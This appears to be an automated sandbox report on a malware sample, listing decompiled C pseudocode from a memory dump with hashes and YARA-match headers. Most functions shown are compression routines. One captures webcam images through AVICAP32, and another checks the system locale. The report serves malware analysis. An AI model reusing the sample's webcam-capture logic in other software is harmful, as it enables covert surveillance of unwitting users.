                                    • Instruction Fuzzy Hash: 50118A30B04204ABFF11DBA4CC91B9EB3E9EB58708F608170A405F77D9EAB4DF909655
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E240334CC(signed int __eax, signed int __ecx, signed short* __edx, signed short* _a4, signed int* _a8, intOrPtr* _a12) {
                                    				signed int _v8;
                                    				signed short* _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				signed int _v24;
                                    				signed int _v28;
                                    				signed int _v32;
                                    				signed int _v36;
                                    				signed int _v40;
                                    				signed int _v44;
                                    				signed int _v48;
                                    				signed short _v50;
                                    				char _v51;
                                    				char _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				intOrPtr _v64;
                                    				signed int _v68;
                                    				signed short* _v72;
                                    				char _v74;
                                    				char _v102;
                                    				char _v104;
                                    				char _v134;
                                    				short* _t236;
                                    				signed short* _t237;
                                    				short* _t239;
                                    				signed int _t241;
                                    				intOrPtr* _t242;
                                    				signed int _t248;
                                    				signed short _t265;
                                    				signed int _t266;
                                    				signed int _t288;
                                    				signed int _t289;
                                    				signed short _t297;
                                    				signed int _t312;
                                    				signed int _t319;
                                    				void* _t338;
                                    				signed int _t343;
                                    				short _t348;
                                    				signed short* _t349;
                                    				signed int _t354;
                                    				signed int _t358;
                                    				signed int _t359;
                                    				signed int _t363;
                                    				signed int _t364;
                                    				intOrPtr _t369;
                                    				unsigned int _t375;
                                    				intOrPtr* _t382;
                                    				intOrPtr* _t383;
                                    				signed int _t386;
                                    				void* _t389;
                                    
                                    				_t289 = __ecx;
                                    				_v12 = __edx;
                                    				_v8 = __eax;
                                    				_v16 = 0;
                                    				_t236 =  &_v104;
                                    				do {
                                    					 *_t236 = 0;
                                    					_v16 = _v16 + 1;
                                    					_t236 = _t236 + 2;
                                    				} while (_v16 <= 0xf);
                                    				_t338 = 0;
                                    				_t237 = _v12;
                                    				if(__ecx <= 0) {
                                    					L4:
                                    					_t239 =  &_v74;
                                    					_v28 =  *_a8;
                                    					_v24 = 0xf;
                                    					while( *_t239 == 0) {
                                    						_v24 = _v24 - 1;
                                    						_t239 = _t239 + 0xfffffffe;
                                    						if(_v24 >= 1) {
                                    							continue;
                                    						}
                                    						break;
                                    					}
                                    					if(_v28 > _v24) {
                                    						_v28 = _v24;
                                    					}
                                    					if(_v24 != 0) {
                                    						_v20 = 1;
                                    						_v72 =  &_v102;
                                    						while(1) {
                                    							__eflags =  *_v72;
                                    							if( *_v72 != 0) {
                                    								break;
                                    							}
                                    							_v20 = _v20 + 1;
                                    							_v72 =  &(_v72[1]);
                                    							__eflags = _v20 - 0xf;
                                    							if(_v20 <= 0xf) {
                                    								continue;
                                    							}
                                    							break;
                                    						}
                                    						__eflags = _v28 - _v20;
                                    						if(_v28 < _v20) {
                                    							_v28 = _v20;
                                    						}
                                    						_v16 = 1;
                                    						_t343 = 1;
                                    						_t241 =  &_v102;
                                    						while(1) {
                                    							_t343 = _t343 + _t343 - ( *_t241 & 0x0000ffff);
                                    							__eflags = _t343;
                                    							if(_t343 < 0) {
                                    								break;
                                    							}
                                    							_v16 = _v16 + 1;
                                    							_t241 = _t241 + 2;
                                    							__eflags = _v16 - 0xf;
                                    							if(_v16 <= 0xf) {
                                    								continue;
                                    							}
                                    							__eflags = _t343;
                                    							if(_t343 <= 0) {
                                    								L24:
                                    								_v134 = 0;
                                    								_v16 = 1;
                                    								_t242 =  &_v134;
                                    								_v72 =  &_v102;
                                    								do {
                                    									 *((short*)(_t242 + 2)) =  *_t242 +  *_v72;
                                    									_t242 = _t242 + 2;
                                    									_v16 = _v16 + 1;
                                    									_v72 =  &(_v72[1]);
                                    									__eflags = _v16 - 0xf;
                                    								} while (_v16 < 0xf);
                                    								_t348 = 0;
                                    								_v72 = _v12;
                                    								__eflags = _t289;
                                    								if(_t289 <= 0) {
                                    									L30:
                                    									__eflags = _v8 - 1;
                                    									if(__eflags < 0) {
                                    										_t349 = _a4;
                                    										_v64 = _t349;
                                    										_v60 = _t349;
                                    										_v68 = 0x13;
                                    									} else {
                                    										if(__eflags == 0) {
                                    											_v60 = 0x24057e84;
                                    											_v60 = _v60 - 0x202;
                                    											_v64 = 0x24057ec2;
                                    											_v64 = _v64 - 0x202;
                                    											_v68 = 0x100;
                                    										} else {
                                    											_v60 = 0x24057f00;
                                    											_v64 = 0x24057f40;
                                    											_v68 = 0xffffffff;
                                    										}
                                    									}
                                    									_v16 = _v20;
                                    									_t386 = 0;
                                    									_v56 =  *_a12;
                                    									_t248 = _v28;
                                    									_v32 = 0;
                                    									_v44 = 0xffffffff;
                                    									_v36 = 1 << _v28;
                                    									_v48 = _v36 - 1;
                                    									__eflags = _v8 - 1;
                                    									if(_v8 != 1) {
                                    										L39:
                                    										_v72 = _a4;
                                    										while(1) {
                                    											_v51 = _v16 - _v32;
                                    											_t297 =  *_v72;
                                    											_t354 = _t297 & 0x0000ffff;
                                    											__eflags = _t354 - _v68;
                                    											if(_t354 >= _v68) {
                                    												__eflags = _t354 - _v68;
                                    												if(_t354 <= _v68) {
                                    													_v52 = 0x60;
                                    													_v50 = 0;
                                    												} else {
                                    													_v52 =  *((intOrPtr*)(_v64 + _t354 * 2));
                                    													_v50 =  *((intOrPtr*)(_v60 + _t354 * 2));
                                    												}
                                    											} else {
                                    												_v52 = 0;
                                    												_v50 = _t297;
                                    											}
                                    											__eflags = 1;
                                    											_v40 = 1 << _t248;
                                    											_v20 = _v40;
                                    											do {
                                    												L46:
                                    												_v40 = _v40 - 1;
                                    												 *((intOrPtr*)(_v56 + ((_t386 >> _v32) + _v40) * 4)) = _v52;
                                    												__eflags = _v40;
                                    											} while (_v40 != 0);
                                    											_t358 = 1 << _v16 - 1;
                                    											while(1) {
                                    												__eflags = _t358 & _t386;
                                    												if((_t358 & _t386) == 0) {
                                    													break;
                                    												}
                                    												_t358 = _t358 >> 1;
                                    												__eflags = _t358;
                                    											}
                                    											__eflags = _t358;
                                    											if(_t358 == 0) {
                                    												_t386 = 0;
                                    												__eflags = 0;
                                    											} else {
                                    												_t386 = (_t386 & _t358 - 0x00000001) + _t358;
                                    											}
                                    											_v72 =  &(_v72[1]);
                                    											_t359 = _v16;
                                    											 *(_t389 + _t359 * 2 - 0x64) =  *(_t389 + _t359 * 2 - 0x64) - 1;
                                    											__eflags =  *(_t389 + _t359 * 2 - 0x64);
                                    											if( *(_t389 + _t359 * 2 - 0x64) != 0) {
                                    												L56:
                                    												__eflags = _v16 - _v28;
                                    												if(_v16 <= _v28) {
                                    													continue;
                                    													do {
                                    														do {
                                    															_v51 = _v16 - _v32;
                                    															_t297 =  *_v72;
                                    															_t354 = _t297 & 0x0000ffff;
                                    															__eflags = _t354 - _v68;
                                    															if(_t354 >= _v68) {
                                    																__eflags = _t354 - _v68;
                                    																if(_t354 <= _v68) {
                                    																	_v52 = 0x60;
                                    																	_v50 = 0;
                                    																} else {
                                    																	_v52 =  *((intOrPtr*)(_v64 + _t354 * 2));
                                    																	_v50 =  *((intOrPtr*)(_v60 + _t354 * 2));
                                    																}
                                    															} else {
                                    																_v52 = 0;
                                    																_v50 = _t297;
                                    															}
                                    															__eflags = 1;
                                    															_v40 = 1 << _t248;
                                    															_v20 = _v40;
                                    															goto L46;
                                    														} while (_v16 <= _v28);
                                    														goto L57;
                                    													} while ((_v48 & _t386) == _v44);
                                    													__eflags = _v32;
                                    													if(_v32 == 0) {
                                    														_v32 = _v28;
                                    													}
                                    													_v56 = _v56 + (_v20 << 2);
                                    													_t248 = _v16 - _v32;
                                    													_t363 = 1 << _t248;
                                    													while(1) {
                                    														_t312 = _v32 + _t248;
                                    														__eflags = _t312 - _v24;
                                    														if(_t312 >= _v24) {
                                    															break;
                                    														}
                                    														_t364 = _t363 - ( *(_t389 + _t312 * 2 - 0x64) & 0x0000ffff);
                                    														__eflags = _t364;
                                    														if(_t364 <= 0) {
                                    															break;
                                    														}
                                    														_t248 = _t248 + 1;
                                    														_t363 = _t364 + _t364;
                                    														__eflags = _t363;
                                    													}
                                    													_v36 = _v36 + (1 << _t248);
                                    													__eflags = _v8 - 1;
                                    													if(_v8 != 1) {
                                    														L67:
                                    														_v44 = _v48 & _t386;
                                    														_t369 =  *_a12;
                                    														 *(_t369 + _v44 * 4) = _t248;
                                    														 *((char*)(_t369 + 1 + _v44 * 4)) = _v28;
                                    														_t319 = _v56 - _t369;
                                    														__eflags = _t319;
                                    														if(_t319 < 0) {
                                    															_t319 = _t319 + 3;
                                    															__eflags = _t319;
                                    														}
                                    														 *((short*)(_t369 + 2 + _v44 * 4)) = _t319 >> 2;
                                    														continue;
                                    													}
                                    													__eflags = _v36 - 0x5b0;
                                    													if(_v36 < 0x5b0) {
                                    														goto L67;
                                    													}
                                    													return 1;
                                    												}
                                    												L57:
                                    												__eflags = (_v48 & _t386) - _v44;
                                    											} else {
                                    												__eflags = _v16 - _v24;
                                    												if(_v16 == _v24) {
                                    													_v52 = 0x40;
                                    													_v51 = _v16 - _v32;
                                    													_v50 = 0;
                                    													__eflags = _t386;
                                    													if(_t386 == 0) {
                                    														L81:
                                    														 *_a12 =  *_a12 + (_v36 << 2);
                                    														 *_a8 = _v28;
                                    														__eflags = 0;
                                    														return 0;
                                    													} else {
                                    														goto L71;
                                    													}
                                    													do {
                                    														L71:
                                    														__eflags = _v32;
                                    														if(_v32 != 0) {
                                    															__eflags = (_v48 & _t386) - _v44;
                                    															if((_v48 & _t386) != _v44) {
                                    																__eflags = 0;
                                    																_v32 = 0;
                                    																_v16 = _v28;
                                    																_v56 =  *_a12;
                                    																_v51 = _v16;
                                    															}
                                    														}
                                    														 *((intOrPtr*)(_v56 + (_t386 >> _v32) * 4)) = _v52;
                                    														_t375 = 1 << _v16 - 1;
                                    														while(1) {
                                    															__eflags = _t375 & _t386;
                                    															if((_t375 & _t386) == 0) {
                                    																goto L77;
                                    															}
                                    															_t375 = _t375 >> 1;
                                    															__eflags = _t375;
                                    														}
                                    														L77:
                                    														__eflags = _t375;
                                    														if(_t375 == 0) {
                                    															_t386 = 0;
                                    															__eflags = 0;
                                    														} else {
                                    															_t386 = (_t386 & _t375 - 0x00000001) + _t375;
                                    														}
                                    														__eflags = _t386;
                                    													} while (_t386 != 0);
                                    													goto L81;
                                    												}
                                    												_v16 = _v12[ *_v72 & 0x0000ffff] & 0x0000ffff;
                                    												goto L56;
                                    											}
                                    										}
                                    									} else {
                                    										__eflags = _v36 - 0x5b0;
                                    										if(_v36 < 0x5b0) {
                                    											goto L39;
                                    										}
                                    										return 1;
                                    									}
                                    								} else {
                                    									goto L27;
                                    								}
                                    								do {
                                    									L27:
                                    									_t265 =  *_v72;
                                    									__eflags = _t265;
                                    									if(_t265 != 0) {
                                    										_t266 = _t265 & 0x0000ffff;
                                    										_t73 = _t389 + _t266 * 2 - 0x84;
                                    										 *_t73 =  *(_t389 + _t266 * 2 - 0x84) + 1;
                                    										__eflags =  *_t73;
                                    										 *((short*)(_a4 + ( *(_t389 + _t266 * 2 - 0x84) & 0x0000ffff) * 2)) = _t348;
                                    									}
                                    									_t348 = _t348 + 1;
                                    									_v72 =  &(_v72[1]);
                                    									__eflags = _t289 - _t348;
                                    								} while (_t289 > _t348);
                                    								goto L30;
                                    							}
                                    							__eflags = _v8;
                                    							if(_v8 == 0) {
                                    								L23:
                                    								return _t241 | 0xffffffff;
                                    							}
                                    							__eflags = _v24 - 1;
                                    							if(_v24 == 1) {
                                    								goto L24;
                                    							}
                                    							goto L23;
                                    						}
                                    						return _t241 | 0xffffffff;
                                    					}
                                    					_v52 = 0x40;
                                    					_v51 = 1;
                                    					_v50 = 0;
                                    					_t382 = _a12;
                                    					 *_t382 =  *_t382 + 4;
                                    					 *((intOrPtr*)( *_t382)) = _v52;
                                    					_t383 = _a12;
                                    					 *_t383 =  *_t383 + 4;
                                    					 *((intOrPtr*)( *_t383)) = _v52;
                                    					 *_a8 = 1;
                                    					return 0;
                                    				} else {
                                    					goto L3;
                                    				}
                                    				do {
                                    					L3:
                                    					_t288 =  *_t237 & 0x0000ffff;
                                    					_t237 =  &(_t237[1]);
                                    					_t338 = _t338 + 1;
                                    					 *((short*)(_t389 + _t288 * 2 - 0x64)) =  *((short*)(_t389 + _t288 * 2 - 0x64)) + 1;
                                    				} while (__ecx > _t338);
                                    				goto L4;
                                    			}

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: @
                                    • API String ID: 0-2766056989
                                    • Opcode ID: b0e4988768a89bf1d161a93f8cdfd480e75c3e57f25776fff8ebe7ca698f9577
                                    • Instruction ID: 66b66a26a318658dd4baf729009094ad9504a2d7a87bfcf0e0158fc69e2f52d2
                                    • Opcode Fuzzy Hash: b0e4988768a89bf1d161a93f8cdfd480e75c3e57f25776fff8ebe7ca698f9577
                                    • Instruction Fuzzy Hash: E0F14674E00259CFCB14CF98C580AEEBFB2FF88314F2081A9D851AB355D7B59A85CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 54%
                                    			E2403B690(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                    				intOrPtr _t7;
                                    				intOrPtr _t10;
                                    				intOrPtr _t11;
                                    
                                    				_t10 = _a8;
                                    				_push(_a16);
                                    				_push(_a12);
                                    				_push(_t10);
                                    				_t7 = _a4;
                                    				_push(_t7);
                                    				L24015258();
                                    				_t11 = _t7;
                                    				if(_t10 == 2) {
                                    					E2403B624();
                                    				}
                                    				return _t11;
                                    			}

                                    APIs
                                    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 2403B6A5
                                      • Part of subcall function 2403B624: 6F6121E0.AVICAP32(Video,50000000,00000000,00000000,00000280,000001E0,?,00000001,24049038,000003E8,000003E8,2404E184,webcamgetbuffer,2404E184,webcam,2404E184), ref: 2403B644
                                      • Part of subcall function 2403B624: SendMessageA.USER32(?,0000040B,00000000,00000000), ref: 2403B65D
                                      • Part of subcall function 2403B624: UnregisterClassA.USER32(MainForm,?), ref: 2403B674
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ClassF6121MessageNtdllProc_SendUnregisterWindow
                                    • String ID:
                                    • API String ID: 3444105186-0
                                    • Opcode ID: 74626c36f2ce0fe2ba0b25495e6ac0bbee8d73dfe1dc0e3524e6ddd753c88333
                                    • Instruction ID: 4c97633e9dcd4564c4d4bcf3a2ad2d8922b0fff57890820c02e54d9b993c066c
                                    • Opcode Fuzzy Hash: 74626c36f2ce0fe2ba0b25495e6ac0bbee8d73dfe1dc0e3524e6ddd753c88333
                                    • Instruction Fuzzy Hash: 45D0627260015C6B9B10EDE9DCC0C9BB7ECEB59164B504511FE18D7202D575DD5087B1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E24018F80(void* __eax, void* __ecx) {
                                    				char _v12;
                                    				signed int _t9;
                                    				void* _t11;
                                    				void* _t16;
                                    				void* _t17;
                                    
                                    				_t17 = _t16 + 0xfffffff8;
                                    				_t11 = __eax;
                                    				E24013088(__eax);
                                    				_t9 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 5) & 0xffffff00 | _t8 == 0x00000003;
                                    				if(_t9 != 0) {
                                    					_t9 = E24013274(_t11, _t17);
                                    				}
                                    				return _t9;
                                    			}

                                    APIs
                                    • GetLocaleInfoA.KERNEL32(00000400,0000005A,00000005,00000005), ref: 24018F9B
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID:
                                    • API String ID: 2299586839-0
                                    • Opcode ID: c9fe7f58603b6435ac9e9672cc6855bd1ce640a3a3ce7cc5dae744b2cf1d1d0e
                                    • Instruction ID: 218279a9215700e63124332597f8b84e53135f3e76821fc1bb633a7ed156f9ca
                                    • Opcode Fuzzy Hash: c9fe7f58603b6435ac9e9672cc6855bd1ce640a3a3ce7cc5dae744b2cf1d1d0e
                                    • Instruction Fuzzy Hash: B5D095533487002BFC1081341C8170D53C49760335F500239F70CDF3C4C9A4C54D5657
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E2402FD44(intOrPtr __eax, intOrPtr __edx) {
                                    				intOrPtr _v20;
                                    				signed int _v24;
                                    				signed int _v28;
                                    				intOrPtr _t398;
                                    				signed int _t403;
                                    				signed int _t410;
                                    				signed int _t471;
                                    				signed int _t483;
                                    				signed int _t492;
                                    				signed int _t498;
                                    				signed int _t512;
                                    				signed int _t520;
                                    				signed char _t521;
                                    				void* _t522;
                                    				char _t539;
                                    				signed int _t543;
                                    				signed int _t554;
                                    				intOrPtr* _t557;
                                    				signed int _t581;
                                    				signed int _t582;
                                    				signed int _t587;
                                    				signed int _t595;
                                    				signed char* _t597;
                                    				intOrPtr _t625;
                                    				intOrPtr _t626;
                                    				signed int _t673;
                                    				void* _t674;
                                    				void* _t675;
                                    				void* _t676;
                                    				signed int _t682;
                                    				signed int _t691;
                                    				intOrPtr _t693;
                                    				intOrPtr _t694;
                                    				intOrPtr _t695;
                                    				signed int _t697;
                                    				signed int _t698;
                                    				signed int _t699;
                                    				intOrPtr* _t701;
                                    
                                    				_t694 = __edx;
                                    				_t695 = __eax;
                                    				if(__eax == 0 ||  *((intOrPtr*)(__eax + 0x1c)) == 0 || __edx > 4 || __edx < 0) {
                                    					return 0xfffffffe;
                                    				}
                                    				_t557 =  *((intOrPtr*)(__eax + 0x1c));
                                    				if( *((intOrPtr*)(__eax + 0xc)) == 0 ||  *((intOrPtr*)(__eax)) == 0 &&  *((intOrPtr*)(__eax + 4)) != 0 ||  *((intOrPtr*)(_t557 + 4)) == 0x29a && _t694 != 4) {
                                    					_t398 =  *0x24057310; // 0x2402ee6c
                                    					 *((intOrPtr*)(_t695 + 0x18)) = _t398;
                                    					return 0xfffffffe;
                                    				}
                                    				if( *((intOrPtr*)(_t695 + 0x10)) == 0) {
                                    					_t693 =  *0x2405731c; // 0x2402ee9c
                                    					 *((intOrPtr*)(_t695 + 0x18)) = _t693;
                                    					return 0xfffffffb;
                                    				}
                                    				 *_t557 = _t695;
                                    				 *_t701 =  *((intOrPtr*)(_t557 + 0x28));
                                    				 *((intOrPtr*)(_t557 + 0x28)) = _t694;
                                    				if( *((intOrPtr*)(_t557 + 4)) == 0x2a) {
                                    					if( *(_t557 + 0x18) != 2) {
                                    						_t581 = ( *((intOrPtr*)(_t557 + 0x30)) - 8 << 4) + 8 << 8;
                                    						if( *((intOrPtr*)(_t557 + 0x88)) >= 2 ||  *(_t557 + 0x84) < 2) {
                                    							_t498 = 0;
                                    						} else {
                                    							_t512 =  *(_t557 + 0x84);
                                    							if(_t512 >= 6) {
                                    								if(_t512 != 6) {
                                    									_t498 = 3;
                                    								} else {
                                    									_t498 = 2;
                                    								}
                                    							} else {
                                    								_t498 = 1;
                                    							}
                                    						}
                                    						_t582 = _t581 | _t498 << 0x00000006;
                                    						if( *((intOrPtr*)(_t557 + 0x6c)) != 0) {
                                    							_t582 = _t582 | 0x00000020;
                                    						}
                                    						 *((intOrPtr*)(_t557 + 4)) = 0x71;
                                    						E2402FCC8(_t557, _t582 + 0x1f - _t582 % 0x1f);
                                    						if( *((intOrPtr*)(_t557 + 0x6c)) != 0) {
                                    							E2402FCC8(_t557,  *(_t695 + 0x30) >> 0x10);
                                    							E2402FCC8(_t557,  *(_t695 + 0x30) & 0x0000ffff);
                                    						}
                                    						_t558 = 0;
                                    						 *(_t695 + 0x30) = E2402F414(0, 0, 0);
                                    					} else {
                                    						 *(_t695 + 0x30) = E24035850(0, 0);
                                    						 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    						 *( *(_t557 + 8) +  *(_t557 + 0x14)) = 0x1f;
                                    						 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    						 *( *(_t557 + 8) +  *(_t557 + 0x14)) = 0x8b;
                                    						 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    						 *( *(_t557 + 8) +  *(_t557 + 0x14)) = 8;
                                    						if( *(_t557 + 0x1c) != 0) {
                                    							if( *( *(_t557 + 0x1c)) == 0) {
                                    								_t673 = 0;
                                    							} else {
                                    								_t673 = 1;
                                    							}
                                    							if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x2c)) == 0) {
                                    								_t587 = 0;
                                    							} else {
                                    								_t587 = 2;
                                    							}
                                    							_t674 = _t673 + _t587;
                                    							if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x10)) != 0) {
                                    								_t520 = 4;
                                    							} else {
                                    								_t520 = 0;
                                    							}
                                    							_t675 = _t674 + _t520;
                                    							if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x1c)) != 0) {
                                    								_t521 = 8;
                                    							} else {
                                    								_t521 = 0;
                                    							}
                                    							_t676 = _t675 + _t521;
                                    							if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x24)) != 0) {
                                    								_t522 = 0x10;
                                    							} else {
                                    								_t522 = 0;
                                    							}
                                    							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    							 *( *(_t557 + 8) +  *(_t557 + 0x14)) = _t676 + _t522;
                                    							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    							 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *( *(_t557 + 0x1c) + 4) & 0x000000ff;
                                    							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    							 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *( *(_t557 + 0x1c) + 4) >> 0x00000008 & 0x000000ff;
                                    							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    							 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *( *(_t557 + 0x1c) + 4) >> 0x00000010 & 0x000000ff;
                                    							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    							 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *( *(_t557 + 0x1c) + 4) >> 0x00000018 & 0x000000ff;
                                    							_t682 =  *(_t557 + 0x14);
                                    							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    							_t595 =  *(_t557 + 8);
                                    							if( *(_t557 + 0x84) != 9) {
                                    								if( *((intOrPtr*)(_t557 + 0x88)) >= 2 ||  *(_t557 + 0x84) < 2) {
                                    									_t539 = 4;
                                    								} else {
                                    									_t539 = 0;
                                    								}
                                    							} else {
                                    								_t539 = 2;
                                    							}
                                    							 *((char*)(_t595 + _t682)) = _t539;
                                    							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    							_t558 =  *(_t557 + 8);
                                    							 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *( *(_t557 + 0x1c) + 0xc) & 0x000000ff;
                                    							_t543 =  *(_t557 + 0x1c);
                                    							if( *((intOrPtr*)(_t543 + 0x10)) != 0) {
                                    								 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    								_t597 =  *(_t557 + 8) +  *(_t557 + 0x14);
                                    								 *_t597 =  *(_t543 + 0x14) & 0x000000ff;
                                    								 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    								_t558 =  *( *(_t557 + 0x1c) + 0x14) >> 0x00000008 & 0x000000ff;
                                    								 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *( *(_t557 + 0x1c) + 0x14) >> 0x00000008 & 0x000000ff;
                                    							}
                                    							if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x2c)) != 0) {
                                    								_t558 =  *(_t557 + 0x14);
                                    								 *(_t695 + 0x30) = E24035850( *(_t557 + 0x14),  *(_t557 + 8));
                                    							}
                                    							 *((intOrPtr*)(_t557 + 0x20)) = 0;
                                    							 *((intOrPtr*)(_t557 + 4)) = 0x45;
                                    						} else {
                                    							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    							 *( *(_t557 + 8) +  *(_t557 + 0x14)) = 0;
                                    							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    							 *( *(_t557 + 8) +  *(_t557 + 0x14)) = 0;
                                    							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    							 *( *(_t557 + 8) +  *(_t557 + 0x14)) = 0;
                                    							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    							 *( *(_t557 + 8) +  *(_t557 + 0x14)) = 0;
                                    							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    							 *( *(_t557 + 8) +  *(_t557 + 0x14)) = 0;
                                    							_t554 =  *(_t557 + 0x14);
                                    							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    							_t691 =  *(_t557 + 8);
                                    							if( *(_t557 + 0x84) != 9) {
                                    								if( *((intOrPtr*)(_t557 + 0x88)) >= 2 ||  *(_t557 + 0x84) < 2) {
                                    									_t558 = 4;
                                    								} else {
                                    									_t558 = 0;
                                    								}
                                    							} else {
                                    								_t558 = 2;
                                    							}
                                    							 *(_t691 + _t554) = _t558;
                                    							 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    							 *( *(_t557 + 8) +  *(_t557 + 0x14)) = 0xb;
                                    							 *((intOrPtr*)(_t557 + 4)) = 0x71;
                                    						}
                                    					}
                                    				}
                                    				if( *((intOrPtr*)(_t557 + 4)) != 0x45) {
                                    					L78:
                                    					if( *((intOrPtr*)(_t557 + 4)) != 0x49) {
                                    						L94:
                                    						if( *((intOrPtr*)(_t557 + 4)) != 0x5b) {
                                    							L110:
                                    							if( *((intOrPtr*)(_t557 + 4)) == 0x67) {
                                    								_t558 =  *(_t557 + 0x1c);
                                    								if( *((intOrPtr*)( *(_t557 + 0x1c) + 0x2c)) == 0) {
                                    									 *((intOrPtr*)(_t557 + 4)) = 0x71;
                                    								} else {
                                    									if( *(_t557 + 0x14) + 2 >  *((intOrPtr*)(_t557 + 0xc))) {
                                    										E2402FCF0(_t695, _t558);
                                    									}
                                    									if( *(_t557 + 0x14) + 2 <=  *((intOrPtr*)(_t557 + 0xc))) {
                                    										 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    										 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *(_t695 + 0x30) & 0x000000ff;
                                    										 *(_t557 + 0x14) =  *(_t557 + 0x14) + 1;
                                    										 *( *(_t557 + 8) +  *(_t557 + 0x14)) =  *(_t695 + 0x30) >> 0x00000008 & 0x000000ff;
                                    										_t558 = 0;
                                    										 *(_t695 + 0x30) = E24035850(0, 0);
                                    										 *((intOrPtr*)(_t557 + 4)) = 0x71;
                                    									}
                                    								}
                                    							}
                                    							if( *(_t557 + 0x14) == 0) {
                                    								if( *((intOrPtr*)(_t695 + 4)) != 0 || _t694 >  *_t701 || _t694 == 4) {
                                    									goto L124;
                                    								} else {
                                    									_t626 =  *0x2405731c; // 0x2402ee9c
                                    									 *((intOrPtr*)(_t695 + 0x18)) = _t626;
                                    									return 0xfffffffb;
                                    								}
                                    							} else {
                                    								E2402FCF0(_t695, _t558);
                                    								if( *((intOrPtr*)(_t695 + 0x10)) != 0) {
                                    									L124:
                                    									if( *((intOrPtr*)(_t557 + 4)) != 0x29a ||  *((intOrPtr*)(_t695 + 4)) == 0) {
                                    										if( *((intOrPtr*)(_t695 + 4)) != 0 ||  *((intOrPtr*)(_t557 + 0x74)) != 0 || _t694 != 0 &&  *((intOrPtr*)(_t557 + 4)) != 0x29a) {
                                    											_v20 =  *((intOrPtr*)( *((intOrPtr*)(0x24057334 + ( *(_t557 + 0x84) +  *(_t557 + 0x84) * 2) * 4))))();
                                    											if(_v20 == 2 || _v20 == 3) {
                                    												 *((intOrPtr*)(_t557 + 4)) = 0x29a;
                                    											}
                                    											if(_v20 == 0 || _v20 == 2) {
                                    												if( *((intOrPtr*)(_t695 + 0x10)) == 0) {
                                    													 *((intOrPtr*)(_t557 + 0x28)) = 0xffffffff;
                                    												}
                                    												return 0;
                                    											} else {
                                    												if(_v20 != 1) {
                                    													goto L146;
                                    												}
                                    												if(_t694 != 1) {
                                    													_t558 = 0;
                                    													E24034A80(_t557, 0, 0, 0);
                                    													if(_t694 == 3) {
                                    														_t558 =  *(_t557 + 0x4c);
                                    														 *((short*)( *((intOrPtr*)(_t557 + 0x44)) +  *(_t557 + 0x4c) * 2 - 2)) = 0;
                                    														E2402EED8( *((intOrPtr*)(_t557 + 0x44)), 0,  *(_t557 + 0x4c) - 1 +  *(_t557 + 0x4c) - 1);
                                    													}
                                    												} else {
                                    													E24034B3C(_t557);
                                    												}
                                    												E2402FCF0(_t695, _t558);
                                    												if( *((intOrPtr*)(_t695 + 0x10)) != 0) {
                                    													goto L146;
                                    												} else {
                                    													 *((intOrPtr*)(_t557 + 0x28)) = 0xffffffff;
                                    													return 0;
                                    												}
                                    											}
                                    										} else {
                                    											L146:
                                    											if(_t694 == 4) {
                                    												_t403 =  *(_t557 + 0x18);
